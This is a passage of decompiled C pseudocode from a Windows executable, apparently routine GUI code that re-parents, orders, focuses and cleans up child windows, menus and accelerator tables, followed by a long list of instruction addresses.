												_t719 = _t719 + 0xc;
												_t403 = _t617[_t413];
											}
											__eflags = _t403;
											if(_t403 != 0) {
												_t403 =  *(_t403 + 0x1c);
											}
											E00484C84(_t708, SetParent( *( *((intOrPtr*)(_t719 + 0x34)) + 0x1c), _t403));
											_t616 =  *(_t719 + 0x48);
											__eflags =  *(_t616 + _t498 * 4);
											if( *(_t616 + _t498 * 4) != 0) {
												_t409 = _t691[1];
												_t693 =  &(_t691[2]);
												__eflags = _t409;
												if(_t409 > 0) {
													while(1) {
														__eflags =  *_t693;
														if( *_t693 == 0) {
															break;
														}
														_t409 = _t409 - 1;
														_t693 =  &(_t693[1]);
														__eflags = _t409;
														if(_t409 > 0) {
															continue;
														} else {
														}
														goto L78;
													}
													__eflags = _t409;
													if(_t409 > 0) {
														_t499 =  *(_t719 + 0x24);
														_t714 = _t409;
														do {
															_t410 =  *_t693;
															__eflags = _t410;
															if(_t410 != 0) {
																_t412 = E0040C0B0(_t636,  *(_t719 + 0x20), _t410);
																_t719 = _t719 + 0xc;
																 *((char*)(_t412 + _t499)) = 0;
															}
															_t693 =  &(_t693[1]);
															_t714 = _t714 - 1;
															__eflags = _t714;
														} while (_t714 != 0);
													}
												}
											}
											L78:
											_t680 =  *(_t719 + 0x14);
											_t408 =  &( *(_t719 + 0x10)->i);
											 *(_t719 + 0x10) = _t408;
											_t486 = _t408;
										} else {
											_t486 =  &(_t486->i);
											 *(_t719 + 0x10) = _t486;
										}
										continue;
										while(1) {
											L80:
											 *(_t719 + 0x10) = _t487;
											while(1) {
												_t637 = E004135B0(_t680, _t487, 0);
												__eflags = _t637;
												if(_t637 == 0) {
													break;
												}
												_t551 = _t680;
												_t378 = E00413C90(_t680, _t487);
												__eflags = _t378 - 1;
												if(_t378 != 1) {
													_t661 = _t637 + 0x18;
													_t662 = _t661 + E0040C020(_t551, _t661);
													_t380 = E0040C020(_t551, _t662);
													_t613 =  *(_t719 + 0x18);
													_t713 =  *((intOrPtr*)(_t380 + _t662 + 0x18));
													_t719 = _t719 + 8;
													__eflags = _t613 - 2;
													 *(_t719 + 0x2c) =  *(_t380 + _t662);
													_t185 = _t613 - 1; // -1
													_t497 = _t185;
													if(_t613 < 2) {
														L88:
														SetWindowPos( *( *(_t719 + 0x2c) + 0x1c), 0, 0, 0, 0, 0, 0x13);
														goto L89;
													} else {
														do {
															_t387 = E004135B0(_t680, _t497, 0);
															_t555 = _t680;
															_t663 = _t387;
															_t388 = E00413C90(_t680, _t497);
															__eflags = _t388;
															if(_t388 != 0) {
																goto L87;
															} else {
																_t664 = _t663 + 0x18;
																_t665 = _t664 + E0040C020(_t555, _t664);
																_t666 = _t665 + E0040C020(_t555, _t665);
																_t719 = _t719 + 8;
																__eflags =  *((intOrPtr*)(_t666 + 0x18)) - _t713;
																if( *((intOrPtr*)(_t666 + 0x18)) == _t713) {
																	__eflags = _t497 - 1;
																	if(_t497 < 1) {
																		goto L88;
																	} else {
																		_t556 = _t680;
																		_t391 = E004135B0(_t680, _t497, 0);
																		__eflags = _t391;
																		if(_t391 != 0) {
																			_t191 = _t391 + 0x18; // 0x18
																			_t667 = _t191;
																			_t668 = _t667 + E0040C020(_t556, _t667);
																			_t393 = E0040C020(_t556, _t668);
																			_t719 = _t719 + 8;
																			_t670 =  *(_t668 + _t393);
																			__eflags = _t670;
																			if(_t670 != 0) {
																				SetWindowPos( *( *(_t719 + 0x2c) + 0x1c),  *(_t670 + 0x1c), 0, 0, 0, 0, 0x13);
																				L89:
																			}
																		}
																		goto L90;
																	}
																	L101:
																	_t490 =  *((intOrPtr*)( *(_t719 + 0xe8) + 0x18)) - 1;
																	__eflags = _t490;
																	if(_t490 < 0) {
																		_t709 = 0;
																		__eflags = 0;
																	} else {
																		_t688 =  &(_t490->i);
																		_t709 = 0;
																		__eflags = 0;
																		while(1) {
																			_t362 = _t490;
																			_t490 = _t490 - 1;
																			_t688 = _t688 - 1;
																			_t651 = E004135B0( *(_t719 + 0x14), _t362, _t709);
																			__eflags = _t651 - _t709;
																			if(_t651 == _t709) {
																				goto L111;
																			}
																			_t547 =  *(_t719 + 0x14);
																			_t364 = E00413C90( *(_t719 + 0x14), _t688);
																			__eflags = _t364;
																			if(_t364 == 0) {
																				_t652 = _t651 + 0x18;
																				_t653 = _t652 + E0040C020(_t547, _t652);
																				_t366 = E0040C020(_t547, _t653);
																				_t719 = _t719 + 8;
																				_t655 =  *((intOrPtr*)(_t653 + _t366));
																				__eflags = _t655 - _t709;
																				if(_t655 != _t709) {
																					_t368 = IsWindow( *(_t655 + 0x1c));
																					__eflags = _t368;
																					if(_t368 != 0) {
																						SendMessageA( *(_t655 + 0x1c), 0x806f, _t709, _t709);
																					}
																				}
																			}
																			__eflags = _t490 - _t709;
																			if(_t490 >= _t709) {
																				continue;
																			} else {
																			}
																			goto L111;
																		}
																	}
																	L111:
																	SendMessageA( *( *(_t719 + 0x18) + 0x1c), 0x8004, _t709, _t709);
																	_t639 = 1;
																	_t682 =  *(_t719 + 0x1c);
																	__eflags = _t682 - 1;
																	if(_t682 > 1) {
																		_t710 =  *(_t719 + 0x24);
																		_t495 =  *(_t719 + 0x20) + 4;
																		do {
																			asm("sbb edx, edx");
																			E00487621( *_t495, ( ~( *((intOrPtr*)(_t639 + _t710)) - 1) & 0xfffffff8) + 8);
																			_t639 =  &(_t639->i);
																			_t495 = _t495 + 4;
																			__eflags = _t639 - _t682;
																		} while (_t639 < _t682);
																		_t709 = 0;
																		__eflags = 0;
																	}
																	_t311 =  *( *(_t719 + 0x18) + 0x1dc);
																	__eflags = _t311 - _t709;
																	if(_t311 != _t709) {
																		DestroyAcceleratorTable(_t311);
																	}
																	 *( *(_t719 + 0x18) + 0x1dc) =  *(_t719 + 0x28);
																	E00418A40(0x7da, _t709, _t709);
																	_t640 = E00413600( *(_t719 + 0x18), _t709);
																	_t683 =  *((intOrPtr*)(_t719 + 0x4c));
																	 *((intOrPtr*)(_t719 + 0xc4)) = _t683;
																	 *((intOrPtr*)(_t719 + 0xc8)) = _t640;
																	 *(_t719 + 0xcc) = _t709;
																	 *(_t719 + 0xd0) = _t709;
																	 *(_t719 + 0xe8) = _t709;
																	 *(_t719 + 0xec) = _t709;
																	E00418A40(0x7d8, _t719 + 0xb8, _t709);
																	_t491 =  *(_t719 + 0x9c);
																	_t316 = IsWindow(_t491);
																	__eflags = _t316;
																	if(_t316 != 0) {
																		 *((intOrPtr*)(_t719 + 0xc4)) = _t683;
																		 *((intOrPtr*)(_t719 + 0xc8)) = _t640;
																		 *(_t719 + 0xcc) = 3;
																		 *(_t719 + 0xd0) = _t709;
																		 *(_t719 + 0xe8) = _t709;
																		 *(_t719 + 0xec) = _t709;
																		E00418A40(0x7d8, _t719 + 0xb8, _t709);
																		_t323 = IsWindow(_t491);
																		__eflags = _t323;
																		if(_t323 != 0) {
																			 *((intOrPtr*)(_t719 + 0xc4)) = _t683;
																			 *((intOrPtr*)(_t719 + 0xc8)) = _t640;
																			 *(_t719 + 0xcc) = 4;
																			 *(_t719 + 0xd0) = _t709;
																			 *(_t719 + 0xe8) = _t709;
																			 *(_t719 + 0xec) = _t709;
																			E00418A40(0x7d8, _t719 + 0xb8, _t709);
																			_t325 = IsWindow(_t491);
																			__eflags = _t325;
																			if(_t325 != 0) {
																				asm("sbb eax, eax");
																				__eflags =  *( ~( *(_t719 + 0x44)) &  *(_t719 + 0x3c));
																				if(__eflags != 0) {
																					_push( *(_t719 + 0xec));
																					_push( *(_t719 + 0xe8));
																					_push(_t683);
																					E00416350(__eflags);
																				}
																				_t329 = IsWindow(_t491);
																				__eflags = _t329;
																				if(_t329 != 0) {
																					__eflags =  *((intOrPtr*)(_t719 + 0xf4)) - 1;
																					if( *((intOrPtr*)(_t719 + 0xf4)) == 1) {
																						_t687 = 0;
																						__eflags = 0;
																						 *( *(_t719 + 0x18) + 0x1bc) = 1;
																						while(1) {
																							_t687 =  &(_t687->i);
																							_t345 = E00413A70( *((intOrPtr*)(_t719 + 0x54)), _t687, _t719 + 0x30);
																							__eflags = _t345;
																							if(_t345 == 0) {
																								goto L131;
																							}
																							_t346 =  *(_t719 + 0x30);
																							__eflags = _t346 -  *(_t719 + 0xe8);
																							if(_t346 !=  *(_t719 + 0xe8)) {
																								_t647 = E004135B0(_t346 + 0x14, _t709, _t709) + 0x18;
																								_t648 = _t647 + E0040C020(_t346 + 0x14, _t647);
																								_t349 = E0040C020(_t346 + 0x14, _t648);
																								_t719 = _t719 + 8;
																								_t650 =  *((intOrPtr*)(_t648 + _t349));
																								__eflags = _t650 - _t709;
																								if(_t650 != _t709) {
																									_t350 = IsWindow( *(_t650 + 0x1c));
																									__eflags = _t350;
																									if(_t350 != 0) {
																										_t353 = E00484C84(_t709, GetParent( *(_t650 + 0x1c)));
																										__eflags = _t353;
																										if(_t353 == 0) {
																											E0040B860( *(_t719 + 0x18) + 0x1c0, _t687,  *(_t650 + 0x1c));
																											E0040B860( *(_t719 + 0x18) + 0x1c0, _t687, E00487648(_t650));
																											E00487663(_t650, _t709);
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																				L131:
																				_t685 = GetFocus();
																				 *(_t719 + 0x50) = _t685;
																				_t493 =  *((intOrPtr*)( *(_t719 + 0xe8) + 0x18)) - 1;
																				__eflags = _t493;
																				if(_t493 >= 0) {
																					_t686 =  &(_t493->i);
																					while(1) {
																						_t336 = _t493;
																						_t493 = _t493 - 1;
																						_t686 = _t686 - 1;
																						_t641 = E004135B0( *(_t719 + 0x14), _t336, _t709);
																						__eflags = _t641 - _t709;
																						if(_t641 == _t709) {
																							break;
																						}
																						_t530 =  *(_t719 + 0x14);
																						_t338 = E00413C90( *(_t719 + 0x14), _t686);
																						__eflags = _t338;
																						if(_t338 == 0) {
																							_t642 = _t641 + 0x18;
																							_t643 = _t642 + E0040C020(_t530, _t642);
																							_t340 = E0040C020(_t530, _t643);
																							_t719 = _t719 + 8;
																							_t645 =  *((intOrPtr*)(_t643 + _t340));
																							__eflags = _t645 - _t709;
																							if(_t645 != _t709) {
																								_t341 = IsWindow( *(_t645 + 0x1c));
																								__eflags = _t341;
																								if(_t341 != 0) {
																									SendMessageA( *(_t645 + 0x1c), 0x8076, _t709, _t709);
																								}
																							}
																						}
																						__eflags = _t493 - _t709;
																						if(_t493 >= _t709) {
																							continue;
																						}
																						break;
																					}
																					_t685 =  *(_t719 + 0x50);
																				}
																				__eflags = _t685 - _t709;
																				if(_t685 != _t709) {
																					_t333 = IsWindow(_t685);
																					__eflags = _t333;
																					if(_t333 != 0) {
																						_t334 = GetFocus();
																						__eflags = _t334 - _t685;
																						if(_t334 != _t685) {
																							SetFocus(_t685);
																						}
																					}
																				}
																				 *( *(_t719 + 0x18) + 0x1b8) = 1;
																			}
																		}
																	}
																	 *((intOrPtr*)(_t719 + 0x34)) = 0x495e50;
																	E0040B7D0(_t719 + 0x34);
																	 *((intOrPtr*)(_t719 + 0x68)) = 0x495e50;
																	E0040B7D0(_t719 + 0x68);
																	 *((intOrPtr*)(_t719 + 0x7c)) = 0x495e50;
																	E0040B7D0(_t719 + 0x7c);
																	 *((intOrPtr*)(_t719 + 0x54)) = 0x495e50;
																	E0040B7D0(_t719 + 0x54);
																	return 1;
																	goto L146;
																} else {
																	goto L87;
																}
															}
															goto L90;
															L87:
															_t497 = _t497 - 1;
															__eflags = _t497 - 1;
														} while (_t497 >= 1);
														goto L88;
													}
													L90:
													_t386 =  &( *(_t719 + 0x10)->i);
													 *(_t719 + 0x10) = _t386;
													_t487 = _t386;
													continue;
												} else {
													_t487 =  &(_t487[0]);
													goto L80;
												}
												while(1) {
													L96:
													_t488 =  *(_t719 + 0x14);
													_t681 =  &(_t681->i);
													_t638 = E004135B0(_t488, _t681, 0);
													__eflags = _t638;
													if(_t638 == 0) {
														goto L101;
													}
													_t196 = _t681 - 1; // 0x1
													_t549 = _t488;
													_t370 = E00413C90(_t488, _t196);
													__eflags = _t370 - 1;
													if(_t370 != 1) {
														_t197 = _t638 + 0x18; // 0x18
														_t496 = _t197;
														_t656 = _t496;
														_t657 = _t656 + E0040C020(_t549, _t656);
														_t372 = E0040C020(_t549, _t657);
														_t550 =  *(_t657 + _t372 + 0x1c);
														_t201 = _t372 + 0x1c; // 0x34
														_t658 = _t496;
														_t203 = _t550 * 4; // 0x38
														_t711 = _t657 + _t201 + _t203 + 4;
														_t659 = _t658 + E0040C020( *(_t657 + _t372 + 0x1c), _t658);
														_t375 = E0040C020( *(_t657 + _t372 + 0x1c), _t659);
														_t206 = _t659 + 0x14; // 0x14
														_t660 = _t375 + _t206;
														_t376 =  *(_t657 + _t201 + _t203 + 4);
														_t719 = _t719 + 0x10;
														__eflags = _t376;
														if(_t376 <= 0) {
															 *_t660 = 0;
														} else {
															_t377 = E004201B0( &(_t711[1]), _t376);
															_t719 = _t719 + 8;
															 *_t660 = _t377;
														}
													}
												}
												goto L101;
											}
											_t681 = 0;
											__eflags = 0;
											goto L96;
										}
									}
									_t487 = 1;
									goto L80;
								} else {
									while(1) {
										asm("sbb edi, edi");
										_t674 =  ~(_t484 - _t678) & _t484;
										_t715 = E004135B0( *(_t719 + 0x14), _t674, 0);
										if(_t715 == 0) {
											goto L42;
										}
										_t564 =  *(_t719 + 0x14);
										if(E00413C90( *(_t719 + 0x14), _t674) != 1) {
											_t500 = E00418A40(0x3ea,  *_t715, 0);
											__eflags = _t500;
											if(_t500 == 0) {
												L58:
												_t418 =  *(_t719 + 0x28);
												__eflags = _t418;
												if(_t418 != 0) {
													DestroyAcceleratorTable(_t418);
												}
												_t419 =  *(_t719 + 0x10);
												__eflags = _t419;
												if(_t419 != 0) {
													DestroyMenu(_t419);
												}
												 *((intOrPtr*)( *( *(_t719 + 0x20)) + 8))();
												goto L56;
											} else {
												_t427 =  *(_t500 + 0x2c);
												__eflags = _t427;
												if(_t427 == 0) {
													goto L58;
												} else {
													_t428 = _t427->i(1);
													__eflags = _t428;
													 *(_t719 + 0x24) = _t428;
													if(_t428 == 0) {
														goto L58;
													} else {
														_t41 = _t715 + 0x18; // 0x18
														_t695 = _t41;
														_t696 = _t695 + E0040C020(_t564, _t695);
														_t430 = E0040C020(_t564, _t696);
														_t720 = _t719 + 8;
														_t697 = _t696 + _t430;
														 *((intOrPtr*)(_t720 + 0x50)) = _t697;
														_t698 = _t697 + 4;
														 *((intOrPtr*)(_t720 + 0xac)) = E00413CB0( *((intOrPtr*)(_t720 + 0x1c)), __eflags, _t715, _t720 + 0x90);
														 *((intOrPtr*)(_t720 + 0xb0)) = E00413600( *((intOrPtr*)(_t720 + 0x1c)), _t674);
														E0040B860(_t720 + 0x68, _t698,  *(_t500 + 0x14) >> 0x00000008 & 0x00000001);
														 *((intOrPtr*)(_t720 + 0x94)) =  *_t698;
														_t699 = _t698 + 0x18;
														 *((intOrPtr*)(_t720 + 0xa4)) =  *((intOrPtr*)(_t698 + 4));
														 *((intOrPtr*)(_t720 + 0xac)) =  *((intOrPtr*)(_t698 + 0xc));
														_t575 =  *_t699;
														 *((intOrPtr*)(_t720 + 0xa0)) =  *((intOrPtr*)(_t698 + 8));
														_t717 = 0;
														_t623 =  *((intOrPtr*)(_t699 + 4 + _t575 * 4));
														_t60 = _t575 * 4; // 0x0
														_t63 = _t623 + 4; // 0x4
														_t700 = _t699 + _t60 + 4 + _t63;
														_t437 = E0040C020(_t575, _t700);
														_t576 =  *(_t500 + 0x14);
														_t719 = _t720 + 4;
														_t438 =  *(_t700 + _t437 + 4);
														__eflags = _t576 & 0x00000080;
														 *(_t719 + 0x98) =  *(_t700 + _t437 + 4);
														if((_t576 & 0x00000080) == 0) {
															__eflags =  *(_t719 + 0xec);
															if( *(_t719 + 0xec) == 0) {
																L29:
																E0040B8E0(_t500, _t719 + 0x34, _t438 & 0x00000001);
																__eflags =  *(_t719 + 0x98) & 0x00000002;
																if(( *(_t719 + 0x98) & 0x00000002) != 0) {
																	_t717 = 0x8000000;
																}
															} else {
																__eflags = _t674;
																if(_t674 != 0) {
																	goto L29;
																} else {
																	E0040B8E0(_t500, _t719 + 0x38, 1);
																}
															}
														} else {
															E0040B8E0(_t500, _t719 + 0x38, 0);
														}
														__eflags =  *(_t719 + 0x98) & 0x00000004;
														if(( *(_t719 + 0x98) & 0x00000004) != 0) {
															_t717 = _t717 | 0x00010000;
															__eflags = _t717;
														}
														__eflags = _t674;
														if(_t674 != 0) {
															_t675 =  *((intOrPtr*)(_t719 + 0xb0));
															_t501 =  *(_t719 + 0x30);
															_t444 =  *(_t719 + 0x5c)( *((intOrPtr*)(_t719 + 0xc8)),  *((intOrPtr*)(_t719 + 0xb0)), _t717,  *((intOrPtr*)( *(_t719 + 0x30) + 0x1c)), _t501, 0,  *((intOrPtr*)(_t719 + 0xa8)),  *((intOrPtr*)(_t719 + 0xb4)),  *(_t719 + 0xa0),  *((intOrPtr*)(_t719 + 0xac)),  *((intOrPtr*)(_t719 + 0x4c)),  *((intOrPtr*)(_t719 + 0xb0)), 0, 0);
															_t502 = _t501 + 0xa;
															__eflags = _t502;
															_t702 = _t444;
															 *(_t719 + 0x2c) = _t502;
															goto L39;
														} else {
															_t503 =  *(_t719 + 0x14);
															_t675 =  *((intOrPtr*)(_t719 + 0xb8));
															 *0x4c97b8 =  *((intOrPtr*)(_t719 + 0xf4));
															_t702 =  *(_t719 + 0x5c)( *((intOrPtr*)(_t719 + 0xc8)),  *((intOrPtr*)(_t719 + 0xac)), _t717,  *((intOrPtr*)(_t719 + 0x110)), 0, _t503,  *((intOrPtr*)(_t719 + 0xa8)),  *((intOrPtr*)(_t719 + 0xb4)),  *((intOrPtr*)(_t719 + 0xa8)),  *((intOrPtr*)(_t719 + 0xac)),  *((intOrPtr*)(_t719 + 0x4c)),  *((intOrPtr*)(_t719 + 0xb8)), _t674, _t674);
															__eflags = _t702;
															 *0x4c97b8 = 0;
															 *(_t719 + 0x18) = _t702;
															if(_t702 == 0) {
																L46:
																_t459 =  *(_t719 + 0x28);
																__eflags = _t459;
																if(_t459 != 0) {
																	DestroyAcceleratorTable(_t459);
																}
																__eflags = _t503;
																if(_t503 != 0) {
																	DestroyMenu(_t503);
																}
																 *((intOrPtr*)( *( *(_t719 + 0x20)) + 8))();
																goto L56;
															} else {
																_t463 =  *(_t702 + 0x1c);
																__eflags = _t463;
																 *(_t719 + 0x9c) = _t463;
																if(_t463 == 0) {
																	goto L46;
																} else {
																	_t464 = IsWindow(_t463);
																	__eflags = _t464;
																	if(_t464 == 0) {
																		goto L46;
																	} else {
																		 *(_t719 + 0x10) = 0;
																		 *(_t702 + 0xd8) =  *(_t719 + 0xec);
																		L39:
																		__eflags = _t702;
																		if(_t702 == 0) {
																			_t445 =  *(_t719 + 0x28);
																			__eflags = _t445;
																			if(_t445 != 0) {
																				DestroyAcceleratorTable(_t445);
																			}
																			_t446 =  *(_t719 + 0x10);
																			__eflags = _t446;
																			if(_t446 != 0) {
																				DestroyMenu(_t446);
																			}
																			 *((intOrPtr*)( *( *(_t719 + 0x20)) + 8))();
																			L56:
																			 *((intOrPtr*)(_t719 + 0x34)) = 0x495e50;
																			E0040B7D0(_t719 + 0x34);
																			 *((intOrPtr*)(_t719 + 0x68)) = 0x495e50;
																			E0040B7D0(_t719 + 0x68);
																			 *((intOrPtr*)(_t719 + 0x7c)) = 0x495e50;
																			E0040B7D0(_t719 + 0x7c);
																			 *((intOrPtr*)(_t719 + 0x54)) = 0x495e50;
																			E0040B7D0(_t719 + 0x54);
																			goto L57;
																		} else {
																			 *( *(_t719 + 0x48)) = _t702;
																			E0040B860(_t719 + 0x58, _t702, _t675);
																			E0040B860(_t719 + 0x80, _t702, _t702);
																			_t678 =  *(_t719 + 0x30);
																			_t454 =  *(_t719 + 0x1c) - 1;
																			__eflags = _t454;
																			 *(_t719 + 0x1c) = _t454;
																			_t484 = _t454;
																			goto L41;
																		}
																	}
																}
															}
														}
													}
												}
											}
										} else {
											_t484 = _t484 - 1;
											 *(_t719 + 0x1c) = _t484;
											L41:
											if(_t484 > 0) {
												continue;
											} else {
												goto L42;
											}
										}
										goto L146;
									}
									goto L42;
								}
							}
						}
					} else {
						_t8 = _t287 + 0x18; // 0x18
						_t703 = _t8;
						_t704 = _t703 + E0040C020(_t504, _t703);
						_t472 = E0040C020(_t504, _t704);
						_t719 = _t719 + 8;
						_t706 =  *((intOrPtr*)(_t704 + _t472));
						if(_t706 == 0 || IsWindow( *(_t706 + 0x1c)) == 0) {
							L6:
							_t676 = 0;
							goto L7;
						} else {
							if( *((intOrPtr*)(_t706 + 0x1b4)) == 0) {
								_t476 = IsIconic( *(_t706 + 0x1c));
								__eflags = _t476;
								if(_t476 == 0) {
									E00484C84(_t707, SetActiveWindow( *(_t706 + 0x1c)));
									return 1;
								} else {
									E00487621(_t706, 9);
									return 1;
								}
							} else {
								E0041BE00(_t706, 0, 0);
								goto L6;
							}
						}
					}
				}
				L146:
			}





























































































































































    0x00416469
    0x00416473
    0x0041647b
    0x0041647f
    0x00416484
    0x00416487
    0x0041648f
    0x00416493
    0x00416496
    0x00416498
    0x0041649c
    0x004164a3
    0x004169fd
    0x004169fd
    0x00416a06
    0x004164a9
    0x004164b0
    0x004164f3
    0x004164fb
    0x00416551
    0x00416558
    0x0041655a
    0x00000000
    0x0041655c
    0x0041655d
    0x00416563
    0x00416565
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00416565
    0x004164fd
    0x004164fd
    0x0041656b
    0x00416572
    0x0041657b
    0x0041657f
    0x00416587
    0x0041658e
    0x00416592
    0x00000000
    0x00416598
    0x004165a2
    0x004165a9
    0x004165ad
    0x004165b4
    0x004165b8
    0x004165c5
    0x004165c6
    0x004165c7
    0x004165c8
    0x004165ca
    0x004165d4
    0x004165d5
    0x004165da
    0x004165dd
    0x004165dd
    0x004165e5
    0x004165f3
    0x004165f7
    0x00416600
    0x00416604
    0x0041660d
    0x00416611
    0x00416616
    0x00416619
    0x0041661b
    0x00416621
    0x00416625
    0x004168e9
    0x004168f3
    0x00416902
    0x00416906
    0x00416912
    0x00416914
    0x00416918
    0x00416923
    0x00416927
    0x0041692c
    0x00416936
    0x00416938
    0x00416941
    0x00416945
    0x00416949
    0x00416953
    0x00416957
    0x00000000
    0x00000000
    0x00416968
    0x00416a50
    0x00416a52
    0x00416a52
    0x00416a59
    0x00416a62
    0x00416a65
    0x00416a6a
    0x00416a6a
    0x00416a6e
    0x00416a71
    0x00416a73
    0x00416a75
    0x00416a8f
    0x00416a77
    0x00416a7e
    0x00416a83
    0x00416a87
    0x00416a8a
    0x00416a8a
    0x00416a93
    0x00416a95
    0x00416a97
    0x00416a97
    0x00416aaa
    0x00416aaf
    0x00416ab3
    0x00416ab7
    0x00416ab9
    0x00416abf
    0x00416ac2
    0x00416ac4
    0x00416ac6
    0x00416ac6
    0x00416ac9
    0x00000000
    0x00000000
    0x00416acb
    0x00416acc
    0x00416acf
    0x00416ad1
    0x00000000
    0x00000000
    0x00416ad3
    0x00000000
    0x00416ad1
    0x00416ad5
    0x00416ad7
    0x00416ad9
    0x00416add
    0x00416adf
    0x00416adf
    0x00416ae1
    0x00416ae3
    0x00416aec
    0x00416af1
    0x00416af4
    0x00416af4
    0x00416af8
    0x00416afb
    0x00416afb
    0x00416afb
    0x00416adf
    0x00416ad7
    0x00416ac4
    0x00416afe
    0x00416b02
    0x00416b06
    0x00416b07
    0x00416b0b
    0x0041696e
    0x0041696e
    0x0041696f
    0x0041696f
    0x00000000
    0x00416b17
    0x00416b17
    0x00416b17
    0x00416b1b
    0x00416b25
    0x00416b27
    0x00416b29
    0x00000000
    0x00000000
    0x00416b30
    0x00416b32
    0x00416b37
    0x00416b3a
    0x00416b3f
    0x00416b48
    0x00416b4b
    0x00416b50
    0x00416b57
    0x00416b5f
    0x00416b62
    0x00416b65
    0x00416b69
    0x00416b69
    0x00416b6c
    0x00416ba7
    0x00416bbb
    0x00000000
    0x00416b6e
    0x00416b6e
    0x00416b73
    0x00416b79
    0x00416b7b
    0x00416b7d
    0x00416b82
    0x00416b84
    0x00000000
    0x00416b86
    0x00416b86
    0x00416b8f
    0x00416b97
    0x00416b99
    0x00416b9c
    0x00416b9f
    0x00416bd1
    0x00416bd4
    0x00000000
    0x00416bd6
    0x00416bd9
    0x00416bdb
    0x00416be0
    0x00416be2
    0x00416be4
    0x00416be4
    0x00416bed
    0x00416bf0
    0x00416bf7
    0x00416bfa
    0x00416bfc
    0x00416bfe
    0x00416bbb
    0x00416bbb
    0x00416bbb
    0x00416bfe
    0x00000000
    0x00416be2
    0x00416c97
    0x00416ca1
    0x00416ca1
    0x00416ca2
    0x00416d0d
    0x00416d0d
    0x00416ca4
    0x00416ca4
    0x00416ca7
    0x00416ca7
    0x00416ca9
    0x00416cad
    0x00416cb0
    0x00416cb2
    0x00416cb8
    0x00416cba
    0x00416cbc
    0x00000000
    0x00000000
    0x00416cbe
    0x00416cc3
    0x00416cc8
    0x00416cca
    0x00416ccc
    0x00416cd5
    0x00416cd8
    0x00416cdf
    0x00416ce2
    0x00416ce4
    0x00416ce6
    0x00416cec
    0x00416cf2
    0x00416cf4
    0x00416d01
    0x00416d01
    0x00416cf4
    0x00416ce6
    0x00416d07
    0x00416d09
    0x00000000
    0x00000000
    0x00416d0b
    0x00000000
    0x00416d09
    0x00416ca9
    0x00416d0f
    0x00416d1e
    0x00416d24
    0x00416d29
    0x00416d2d
    0x00416d2f
    0x00416d35
    0x00416d39
    0x00416d3c
    0x00416d45
    0x00416d4e
    0x00416d53
    0x00416d54
    0x00416d57
    0x00416d57
    0x00416d5b
    0x00416d5b
    0x00416d5b
    0x00416d61
    0x00416d67
    0x00416d69
    0x00416d6c
    0x00416d6c
    0x00416d81
    0x00416d87
    0x00416d96
    0x00416d9f
    0x00416daa
    0x00416db1
    0x00416db8
    0x00416dbf
    0x00416dc6
    0x00416dcd
    0x00416dd4
    0x00416dd9
    0x00416de1
    0x00416de7
    0x00416de9
    0x00416dfd
    0x00416e04
    0x00416e0b
    0x00416e16
    0x00416e1d
    0x00416e24
    0x00416e2b
    0x00416e31
    0x00416e37
    0x00416e39
    0x00416e4d
    0x00416e54
    0x00416e5b
    0x00416e66
    0x00416e6d
    0x00416e74
    0x00416e7b
    0x00416e81
    0x00416e87
    0x00416e89
    0x00416e99
    0x00416e9d
    0x00416ea0
    0x00416eb0
    0x00416eb1
    0x00416eb2
    0x00416eb8
    0x00416eb8
    0x00416ebe
    0x00416ec4
    0x00416ec6
    0x00416ed8
    0x00416eda
    0x00416ee4
    0x00416ee4
    0x00416ee6
    0x00416eec
    0x00416ef8
    0x00416ef9
    0x00416efe
    0x00416f00
    0x00000000
    0x00000000
    0x00416f06
    0x00416f11
    0x00416f13
    0x00416f21
    0x00416f2a
    0x00416f2d
    0x00416f34
    0x00416f37
    0x00416f39
    0x00416f3b
    0x00416f41
    0x00416f47
    0x00416f49
    0x00416f56
    0x00416f5b
    0x00416f5d
    0x00416f6f
    0x00416f7e
    0x00416f86
    0x00416f86
    0x00416f5d
    0x00416f49
    0x00416f3b
    0x00416f13
    0x00416eec
    0x00416eda
    0x00416f90
    0x00416f96
    0x00416f9f
    0x00416fa6
    0x00416fa6
    0x00416fa7
    0x00416fa9
    0x00416fac
    0x00416fb0
    0x00416fb3
    0x00416fb5
    0x00416fbb
    0x00416fbd
    0x00416fbf
    0x00000000
    0x00000000
    0x00416fc1
    0x00416fc6
    0x00416fcb
    0x00416fcd
    0x00416fcf
    0x00416fd8
    0x00416fdb
    0x00416fe2
    0x00416fe5
    0x00416fe7
    0x00416fe9
    0x00416fef
    0x00416ff5
    0x00416ff7
    0x00417004
    0x00417004
    0x00416ff7
    0x00416fe9
    0x0041700a
    0x0041700c
    0x00000000
    0x00000000
    0x00000000
    0x0041700c
    0x0041700e
    0x0041700e
    0x00417012
    0x00417014
    0x00417017
    0x0041701d
    0x0041701f
    0x00417021
    0x00417027
    0x00417029
    0x0041702c
    0x0041702c
    0x00417029
    0x0041701f
    0x00417036
    0x00417036
    0x00416e89
    0x00416e39
    0x00417049
    0x0041704d
    0x00417056
    0x0041705a
    0x00417063
    0x00417067
    0x00417070
    0x00417074
    0x00417088
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00416b9f
    0x00000000
    0x00416ba1
    0x00416ba1
    0x00416ba2
    0x00416ba2
    0x00000000
    0x00416b6e
    0x00416bc1
    0x00416bc5
    0x00416bc6
    0x00416bca
    0x00000000
    0x00416b3c
    0x00416b3c
    0x00000000
    0x00416b3c
    0x00416c1a
    0x00416c1a
    0x00416c1a
    0x00416c25
    0x00416c2b
    0x00416c2d
    0x00416c2f
    0x00000000
    0x00000000
    0x00416c31
    0x00416c34
    0x00416c37
    0x00416c3c
    0x00416c3f
    0x00416c41
    0x00416c41
    0x00416c44
    0x00416c4c
    0x00416c4f
    0x00416c54
    0x00416c58
    0x00416c5c
    0x00416c5f
    0x00416c5f
    0x00416c68
    0x00416c6b
    0x00416c70
    0x00416c70
    0x00416c74
    0x00416c77
    0x00416c7a
    0x00416c7c
    0x00416c8f
    0x00416c7e
    0x00416c83
    0x00416c88
    0x00416c8b
    0x00416c8b
    0x00416c7c
    0x00416c3f
    0x00000000
    0x00416c1a
    0x00416c18
    0x00416c18
    0x00000000
    0x00416c18
    0x00416b17
    0x00416b12
    0x00000000
    0x0041662b
    0x0041662b
    0x00416637
    0x00416639
    0x00416641
    0x00416645
    0x00000000
    0x00000000
    0x0041664b
    0x00416658
    0x00416674
    0x00416676
    0x00416678
    0x00416a09
    0x00416a09
    0x00416a0d
    0x00416a0f
    0x00416a12
    0x00416a12
    0x00416a18
    0x00416a1c
    0x00416a1e
    0x00416a21
    0x00416a21
    0x00416a2d
    0x00000000
